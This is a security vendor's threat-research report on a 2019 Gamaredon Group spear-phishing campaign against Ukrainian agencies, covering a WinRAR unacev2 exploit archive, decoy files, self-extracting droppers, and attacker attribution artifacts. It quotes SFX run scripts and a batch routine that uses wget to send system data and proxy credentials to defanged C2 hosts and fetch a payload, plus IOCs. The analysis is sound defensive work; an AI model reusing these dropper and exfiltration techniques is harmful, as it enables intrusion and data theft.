8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 1/19

August 21, 2019

The Gamaredon Group: A TTP Profile Analysis
fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html

Threat Research

By Evgeny Ananin and Artem Semenchenko | August 21, 2019
A FortiGuard Labs Threat Analysis

FortiGuard Labs recently discovered a fresh malicious campaign being run by the Gamaredon
Group possibly targeting Ukrainian law enforcement and government agencies. We decided to
provide an analysis of the current campaign, particularly focusing on the tools and methods used
by these malicious actors to try to understand their methodologies and what resources are
needed to launch these types of attacks.

The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian
government and military departments from the mid-2013s. In one article published in the Kharkiv
Observer – an independent Ukranian online publication – an unnamed source stated that even
the Ukrainian Presidential Administration has been attacked by malware developed by the
Gamaredon Group. In addition, the anonymous cybersecurity experts referenced in the article
connected the malicious Gamaredon Group actors with Russian state-sponsored hackers.

The group is very active. In addition to the campaign we will analyze in this report, they are also
implicated in the spreading of a new Linux malware – Evil Gnome.

The Gamaredon Group has been active for more than 6 years, and during that time, their Tactics,
Techniques, and Procedures (TTPs) have mostly remained the same. They primarily target
Ukrainian organizations and resources using spear-phishing attacks, and they use military or
similar documents as bait. Once they have found a victim, they then deploy remote manipulation
system binaries (RMS) via self-extracting archives and batch command files.

Current Campaign Analysis
As an example, we decided to analyze one of their latest samples. The following archive caught
our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting
content. In this case, it looked like someone was using the military conflict in Ukraine to deliver
some sort of malware. A quick search for those patterns gave us the source of the archive – the
Gamaredon Group. 

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html
https://www.fortinet.com/blog/search.html?author=Evgeny+Ananin+and+Artem+Semenchenko
https://kharkivobserver.com/ukraine-as-testing-ground-for-russian-cyber-attacks-deterrence/
https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/


8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 2/19

Figure 1. Files inside the archive
The archive contains several decoy files:

1_Миротворець\заява.jpg
Translation: Peacemaker\statement.jpg
 

2_Пiнчук\Пiнчук Андрiй Юрiйович 27.12.1997.docx
Translation: Pinchuk\Pinchuk Andrey Yuriyovych 27.12.1997.doc
Andrey Pinchuk is a Ukranian politician with alleged ties to Russia
 

3_Хавченко\Хавченко Дмитро Василiйович 06.01.1966.docx
Translation: Havchenko \ Havvchenko Dmitry 06.01.1966.doc
Dmitry Havchenko is a Ukranian entrepreneur involved in Ukranian politics who owns
the cryptocurrency exchange WEX.
 

D3i_GMCWAAAq_8u.jpg
ssu_zakon.docx

Translation: Security Service of Ukraine_The Law.docx
 

Several text files

All of the text files contain old phone billing information, as well as coordinates, numbers, and
addresses. We cannot determine if this information is real or not. Even if it is, this kind of data can
be easily found in public domains.

Figure 2. Billing data
Another file is used as bait is called ssu_zakon.docx. This document is just a note regarding the
Security Service of Ukraine (SSU) law.



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 3/19

Figure 3. Contents of ssu_zakon.docx
The archive also contains 2 MS Office documents named correspondingly for the names stated
on the decoy image - Pinchuk Andriy Yuryevich 27.12.1997.docx and Havchenko Dmitry
Vasilyevich 06.01.1966.docx.

The document names are written in Ukrainian, while the content is written in Russian – and in
fact, is just the translated text from the decoy image. The text provides brief information on two
persons, listing the address of their registration and information about their military careers.

Figure 4. Corresponding document contents
Checking the metadata of two documents, we observed the following:

2_Пiнчук\Пiнчук Андрiй Юрiйович 27.12.1997.docx
Created: 10.04.2019 07:33:00
Modified: 10.04.2019 07:34:00



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 4/19

Created by: USER

3_Хавченко\Хавченко Дмитро Василiйович 06.01.1966.docx
Created: 10.04.2019 07:35:00
Modified: 10.04.2019 07:35:00
Created by: USER

ssu_zakon.docx
Created: 28.01.2019 06:42:00
Modified: 05.04.2019 05:05:00
Created by: USER

The files заява.jpg (statement.jpg) and D3i_GMCWAAAq_8u.jpg are the same. The original
source of this picture is a post on a website called Mirotvorets (Peacemaker). The website is
known for publishing the personal information of people who are considered to be “enemies of
Ukraine.”

The text on the pictures below talks about Crimea, the military conflict, and about two people who
are suspected of sponsoring the Presidential election campaign of the current president of
Ukraine (Volodymyr Zelensky). 

Figure 5. Decoy images
The image date on the image is 7 of April 2019. This is the same day it was published on the
Mirotvorets website. But one interesting fact is that WinRAR shows the last modification date as
21.02.2019 22:03:



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 5/19

Figure 6. File last modification time
To understand this time-travel mystery, we decided to check the ACE archive structure.

Figure 7. ACE archive structure information
As you can see on figure 7, the ACE archive contains a date field in MS-DOS format.

If we convert 02/ 21/ 2019,   22:03:06 to an MS-DOS timestamp, we get 0x4E55B063. This would
be written as 0x63B0554E in little-endian ordering. Checking our archive, we can find the
corresponding field:

Figure 8 Timestamp hex value



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 6/19

Now, if we search for it using \x63\xB0\x55\x4E, we find this module for a Metasploit Framework:

Figure 9. Same value in the Metasploit module
Searching further, we observed an earlier Proof of Concept script that was published on the 27
of February, 2019.

Figure 10. Unacev2.dll vulnerability PoC
The date listed in the archive was pre-defined and inserted by generator scripts. This fact gives
us the idea that the attackers are utilizing publicly available scripts to pack their payload. The only
real timestamps we can currently trust are the timestamps extracted from MS Office document
metadata. Those are 05.04.2019 and 10.04.2019. Besides the date and time information, we also
have a very generic username of the file creator: USER.

Exploit Analysis
The exploit drops three files on the file system. Each of them has their own application:

First, the shortcut called “Goggle Chrome.lnk” is placed on the users’ desktop. As you can see in
figure 11, the actor misspelled the browser name. This shortcut is intended to be clicked on by the
user instead of the proper “Google Chrome” browser. The shortcut has a hardcoded path to the
icon, so the proper image will be shown only if the user has the browser installed on their
computer. 

Figure 11. Misspelled shortcut
Next, the same shortcut is placed in the Startup folder at
%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Goggle Chrome.lnk. This
time, the shortcut is placed for persistence purposes. The files in the startup folder will be
executed once the user logs into the system. That way, in case the desktop shortcut hasn’t been
clicked by the user in the current session, the startup file is the backup for the attacker so it can
be executed at the next system reboot or user login.

th

https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/fileformat/winrar_ace.rb
https://github.com/manulqwerty/Evil-WinRAR-Gen/blob/master/evilWinRAR.py


8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 7/19

And finally, the executable file called “win.exe” is placed in
the users’ directory at %userprofile%\win.exe.

Analyzing the win.exe File
The file, dropped to the user folder, is a password-protected self-extracting RAR archive. The file
has a compilation date of 24.04.2017 18:45:49 (GMT).

Figure 12. Executable file compilation timestamp
Knowing the self-extracting archive compilation date allows us to find the WinRAR software
version used by the attacker. When the SFX archive is created, the compilation date is set close
to the timestamp of the corresponding version of the WinRAR software used. So, the only version
that could give that timestamp is WinRAR 5.50 Beta 1 (x86). Its installer file has its timestamp set
to 24.04.2017 18:46:00 (GMT), which is 1 second different from the SFX malware. Trying to
create a self-extracting archive with this version, we got the same date as the one stated in the
malware.

Additionally, the malicious self-extracting archive contains a fake digital signature of a legitimate
Microsoft tool - SysInternals Autoruns. As you can see in the figure below, the signature fails to
pass validation:



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 8/19

Figure 13. Fake digital signature
Moving on, to get the archive password we have to check the shortcut that is linked to it.    



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 9/19

Figure 14. Password inside the shortcut
Once we have a password, we can check the internals of the win.exe file. As can be seen in
figure 15, it contains another executable file called winlog.exe. Besides that, it has an embedded
SFX script that is executed when the archive data is extracted:

Setup = winlog.exe (Execute after extraction)
Silent = 1 (No windows are shown)
Overwrite = 2 (Do not overwrite)

Figure 15. Contents of “win.exe”
Let’s unpack this file and analyze its content.

The file is a 7zip SFX archive that tries to look like a mysterious version of Email Microsoft Office
Word software. This time, the file is even older than the previous SFX archive. Although the last
modification date is set to 10.04.2019 13:55:42 (GMT), the compilation timestamp is 05.03.2016
12:06:17 (GMT). Unfortunately, none of the 7zip software release dates or versions corresponds
to this timestamp, so our previous discovery technique did not work in this case.

Figure 16. Description of “winlog.exe”
This self-extracting archive contains two files and a script that is launched at extraction:

!@Install@!UTF-8!
RunProgram="hidcon:5493.cmd"  (Run batch file with hidden console window after extraction)
GUIMode="2" (No windows are shown)
SelfDelete="1" (Delete the archive after extraction)
;!@InstallEnd@!

To search for any hints of the software used to create this self-extracting archive, we looked into
the file with just a text editor. Luckily, there was some information regarding the version and
copyright.



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 10/19

Figure 17. Copyright inside the archive
This time, searching for the copyright, versions, and script we found a custom tool called Modified
7-Zip SFX module for installers, version 1.6.1 Stable build 3873 was used to create the malicious
file. This tool is freely distributed on the Russian-speaking forum oszone. The custom software
produces a 7zip SFX archive with exactly the same timestamp as the malicious file.

Figure 18. Custom tool posted on the oszone forum
Next, let’s analyze the files contained in the archive.

The first one is called 5532.cmd, and it is a command prompt (batch) file. The second file is an
executable and is called config.exe.

Figure 19. Inside the 7zip SFX archive
Looking into the batch file, we can see that it was not very obfuscated and therefore easy to read.

The first thing we can see is the configuration information. It has a hardcoded C2 server,
filename, and user-agent:

hxxp://lisingrout.ddns[.]net
librelogout.exe
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0"

After the configuration variables we found the main routine. First, the malware extracts its proxy
information from the registry key. HKCU\Software\Microsoft\Windows\CurrentVersion\Internet
Settings. It then saves the following information:



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 11/19

ProxyServer (Proxy server address)
ProxyUser (Proxy username)
ProxyPass (Proxy password)

Next, it gets the name of the computer and generates a unique ID. Once done, it calls  the
systeminfo utility and saves the whole output to a text file that in our case called ohJlkad.txt:

systeminfo > ohJlkad.txt

Figure 20. Initial data collection code
After that, it waits for 40 seconds using the command:

timeout /T 40

Once the timer ends, it will check for the internet connection by launching a ping command and
sending 14 requests to google.com

Once finished, it kills the task with the filename stated in the configuration (“librelogout.exe”) and
deletes the file.

Finally, it calls the config.exe application to provide several arguments:

--user-agent = [hardcoded UA]
--post-data=”

versiya=wrar
comp=%computername%
id=[generated from computer name]
sysinfo=[data from ohJlkad.txt]”
 

“[C2 Server]”
-q -N “[C2 Server]”
-O “librelogout.exe”

In case the user is connected to the internet via proxy, it will provide additional arguments to
config.exe:

-e
--http_proxy=http://[Proxy Server]
--proxy-user=[Proxy username]

proxy password [Proxy password]



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 12/19

Among the arguments, we see one interesting parameter: versiya = wrar. First, the word Versiya
is the Russian Версия or Ukranian Версія, and it means version. As it is set to wrar, we can
guess that it refers to the way the payload is being delivered. In this case, the initial file
mirotvorec.rar contains an exploit for the WinRAR unacev2 module. 

Figure 21. Data exfiltration and payload dropping code
After the config.exe returns, the script launches the main payload hosted on C2. To sum up the
script routine, it takes the following actions:

Collects information about the infected host
Sends it to the C2 via config.exe
Downloads and launches the main payload

Analyzing the config.exe file, we found out that it is a legit wget version (v 1.11.4) with OpenSSL
support compiled for Windows. The file is quite old, as the compilation date goes back to 2009.
Apparently, the attackers decided to not reinvent the wheel and simply used an open-source
solution for exfiltrating the host data and downloading the main payload.

Going Deep into the Shortcut
In addition to analyzing their techniques, we also decided to collect more information about the
attackers. Fortunately, the shortcut they made will help us.

The shortcuts used in Windows are small files that simplify our lives by providing a fast way to
access files, applications, and URLs. Another fact is that the .lnk shortcuts help simplify the
forensic analysis of malicious campaigns by providing the amount of the information hidden from
the user.

First, let’s check the “Goggle Chrome.lnk” by opening its properties:



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 13/19

Figure 22. Artifacts in the shortcut
First, we see that the shortcut contains a Russian string Доступ в Интернет in the comment field,
which translates to Access to the Internet. This text is shown if one hovers the mouse over the
shortcut. The real Google Chrome shortcut will contain this comment and the text will depend on
system language settings. So, we can guess that Windows with the Russian language pack has
been used for forming the malicious shortcut.

Another artifact left by the attackers is the password they used to unpack win.exe.

The -p is the argument for WinRAR SFX to use a password when unpacking. So the rest of the
string – fvthbrfycrbte,k.lrb is the password. If you switch your keyboard layout to Russian and type
the password characters, you eventually recover an obscene phrase in Russian:
“американскиеу**юдки”, that is translated as “American b**tards”. Is this an Easter egg left by
the Gamaredon Group?

Next, let’s move to the shortcut internals. Using the parsers of the .lnk structure, we can extract
more information from the file. We decided to use LNK Parser, a tool that can generate very
detailed html reports.

https://code.google.com/archive/p/lnk-parser/


8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 14/19

Figure 23. Part of the report generated by LNK Parser
As it contains quite a lot of information, we will focus on the most interesting pieces:

The .lnk file was created on 08.04.2019 09:27:06 (UTC).
The shortcut was created on a drive with the serial number: 3c76-6c45
Another path is hardcoded in the shortcut – C:\Users\USER\win.exe. This is probably the
same USER that created the decoy MS Office documents.
PC NetBIOS name: user-pc
MAC address of the machine: 08:00:27:BC:C2:24 (VirtualBox)

We decided to use this information to search for any other samples containing the same MAC
address, drive serial number, or any other unique data from the shortcut.

Once the samples were found, we analyzed and extracted other pieces of information that could
also help us with attribution. The general behavior of the samples found was mostly the same:
SFX archive, batch command file, shortcuts. The only different parts were the bait files and
sometimes the batch scripts used by the attackers.

First, we looked at a sample very similar to the one we deeply researched – mirotvorec.rar. The
name of the archive is the same as the source of the decoy image shown in figure 4. There were
only three main differences we observed: the lack of decoy files (text files and the
ssu_zakon.docx), and different icons used for win.exe and winlog.exe. The last one is different. It
is user-agent written in the script:

"Mozilla/5.0 (Linux; Android 7.1.1; SM-J510H Build/NMF26X) Mobile Safari/537.36"

It looks like the criminal actors are still experimenting with the campaign, trying different patterns
by changing the bait and slightly modifying the dropper malware.



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 15/19

We also discovered a non-political sample called vpnclient-win-msi-5.0.07.0410-k9.exe. The
sample does not use the WinRAR unacev2.dll vulnerability, and indeed contains a legitimate VPN
client tool along with a malicious script that is launched in the background. Analyzing the shortcut
file used in the sample, we found other interesting information left by the actors.

The sample hash is 5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90.

Data extracted from the shortcut included:

Created: 19.03.2019 07:49:13 (UTC)
C:\Users\Carson\1.exe
Carson (C:\Пользователи)
NetBIOS name: user-pc
Drive serial number: 3c76-6c45
MAC address: 08:00:27:BC:C2:24

Here we can see the username of an attacker OS account – Carson. The NetBIOS name, hard
drive serial number, and MAC address remained the same.

This sample has a slight difference in the unpacking method. This time, instead of the shortcut,
the attackers hid the password inside the batch script.

Figure 24. Password hardcoded in the script
As in the previous samples, the password is an obscene phrase in Russian written in an English
keyboard layout.

Another sample that caught our attention was a .lnk shortcut file called 6228. The hash of the file
is: 995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d, and some of the
extracted data follows:

Created 01.07.2019 10:36:33 (UTC)
Strings

_7-ZIP (F:\VZLOM\SBORKA_SCR)
F:\VZLOM\SBORKA_SCR\_7-ZIP\WinRAR.exe
New password used: “dst,bntct,zd;jgegbyljcrbtcerb”
 

PC NetBIOS name: шаман-пк
Drive serial number: 3c76-6c45
MAC address: 08:00:27:BC:C2:24



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 16/19

This time, we observe that the malicious actor changed the VM PC name from user-pc to
shaman-pc (written in Russian). The MAC address and drive serial number are the same. Other
interesting artefacts include the paths they forgot to clean out. The words VZLOM and
SBORKA_SCR are correspondingly translated from Russian as Hacking and SCR Constructor. It
means they are using other specialized tools to generate .scr malware. These tools, based on the
drive letter F, are possibly stored on a USB flash drive or share folder connected to the VM.

Another trace the group left behind is the new SFX unpacking password –
“dst,bntct,zd;jgegbyljcrbtcerb” which is, again, an obscene phrase in Russian written in English
keyboard layout.

Besides this, other similar samples were observed:

1. 0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7

LNK shortcut file
Creation date 04/12/2019 10:44:08 UTC

Last modified 05/06/2019 11:45:30 UTC;
 

New password used: gblfhsuyjqyst

2. 79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1

MS Office document
Create date: 2019:07:22 12:08:00 (GMT)
Author: mmkrasny
Last modified by: Користувач Windows
C2: wifc[.]website

This sample usesVBA macros to drop a payload.  Checking the C2, we can see that it is resolved
as 5.252.193[.]204. From another malicious domain that shares the same IP address – wifu[.]site
– an additional sample has been retrieved:

3. bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac

7zip SFX archive
TimeDateStamp – 31.12.2012 00:38:51 GMT)
Contains 3 files:

8331.txt
13446.cmd
14638

Inside the batch script 13446.cmd, which is a bit different from the discussed sample, we found
this additional information:

C2: hxxp://bits-tor[.]host
Contains another password: whevelfrb
Schedules a task to achieve persistence

The information extracted from the samples could now be used to search for any other
campaigns ran by this group or link any old campaigns to one actor.

Attackers Profile



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 17/19

After we analyzed the data left inside the samples, we went about summarizing the information
we had collected about them to get an idea of who hides behind that group.

On one hand, these malicious actors have been operating since mid-2013, so they more than 6
years of experience.

They are not asking for a ransom
They only target information from the military, government, and other high-level Ukrainian
sources.
The main infection strategy is spear-phishing, with well-combined bait documents that
sometimes cannot be found in public.
They use publicly available legit tools to avoid detection and create their malicious samples.

On the other hand, the traces they left in the malware highlight some basic mistakes.

They use poorly-obfuscated batch scripts, that could be easily analyzed
The leftover paths inside the shortcuts contain usernames, folders and file names. For
state-sponsored hackers, this is very risky because any possible piece of information could
unveil the author
Much of the data is written in Russian and not in Ukrainian
The passwords contain hateful statements in Russian which look like personal messages
from the actor. This type of behavior is peculiar to authors seeking self-affirmation, rather
than professional cybercriminals.

Conclusion
While analyzing a campaign run by the Gamaredon group, we discovered the tools they used to
prepare the attack and found artifacts left behind by the actors that allowed us to perform a large
amount of forensic analysis. No doubt, the group has strong Russian ties if we rely on how much
of that language is used in the malware.

Summarizing our observations regarding the Gamaredon group, we can say that the tools and
methods used are more likely to be associated with political activists rather than with special
services. Unfortunately, we do not have enough proofs to be sure about that. Further monitoring
of their campaigns could probably show us the real face of Gamaredon.

-= FortiGuard Lion Team =-

MITRE ATT&CK Matrix



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 18/19

IOC
5.252.193[.]204 - Malicious
hxxp://lisingrout.ddns[.]net - Malicious
hxxp://bits-tor[.]host - Malicious
hxxp://bits-tor[.]site - Malicious
hxxp://usbqueshions.ddns[.]net - Malicious
hxxp://librework.ddns[.]net - Malicious
hxxp://wifc[.]website - Malicious
hxxp://wifu[.]site - Malicious

04ed2ad4fa67c8abd635d34017c3d04813690a91282a0446c0505b2af97ce48b -
W32/PossibleThreat
0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7 - LNK/Agent.GP!tr
18cd658fac1dd52a75b4eb6558d06dfe5be0e4db7078d72f663c44507449168c -
BAT/Pterodo.QW!tr
257f7f67c59ec8f3837c7e4c99b1dc20c5cd0273bd940beef46d5e641393be37 -
W32/Pterodo.RN!tr 258ecb059c15178caed309a4861421d9f2436e70fb36fb1bf05e95d8d8d7c7e3
- BAT/Pterodo.SV!tr
3725f82661852d89874a3748302bbf27990d25fc10d28831f1ad35a6c6d3b4bd - LNK/Agent.GP!tr
46638ca3be6cdbd302e84c26bf14bfda6ed0c1353808914b40246c40fdb5b8ed - W32/Generic!tr
5b2c7b05368d825a4f3b10d74074d0803234f918166436d3e48ef7f9faf66461 -W32/Pterodo.RN!tr
5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90 - W32/Generic!tr
6b5f4aea458fb737e213714b3dda51f31b03ccb53a6a0501ee608c1bfd0cebb7 -
BAT/Pterodo.SV!tr
79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1 -
VBA/Agent.ATF!tr.dldr
7ba638e8a53e6d1713b8f045c27170ef4a75c88197c57fffe227ca2ab05271e7 - BAT/Agent.GP!tr
842612d1afdf78cb8893018f3aeeec7df9f5f0ab245fe8e6d6b28519d0787937 - BAT/Pterodo.SV!tr
92b474f037796e67cd2f36199a95c9feff46af7e58f4d528567f3f0a857132bf - LNK/Agent.GP!tr
995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d - LNK/Agent.GP!tr
a67167f363c2501d6a1436e5f8c12693d7cf9d2f3ca1f71b21c292f041f91c7a - W32/Pterodo.RN!tr
3b50342b6cd96f400fbf7f00098a7dfcc9561037e4aa0bad8cfeafbb6f17923b -
Riskware/PasswordProtected
bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac -
W32/Generic.VA!tr

b d11 0d1b8b3b9 4 4d1 4 b6 246fff 4 1dd03d 1d094bdf2d80 b8 LNK/A GP!



8/22/2019 The Gamaredon Group: A TTP Profile Analysis

https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html 19/19

d2bbecda830821ed3a00737c67fecb7985d612af58a31a1ee8488ad0409ed23b - LNK/Agent.GP!tr
e1e31702aad4bd7557a05906eb3004e9a72d77aa57e448379bee9a350cbba657 -
BAT/Pterodo.SV!tr
ffc438d33f45ea56935f2bb6fca29e71862ecafb8b7e69ea19abd6df2d255075 - BAT/Pterodo.SV!tr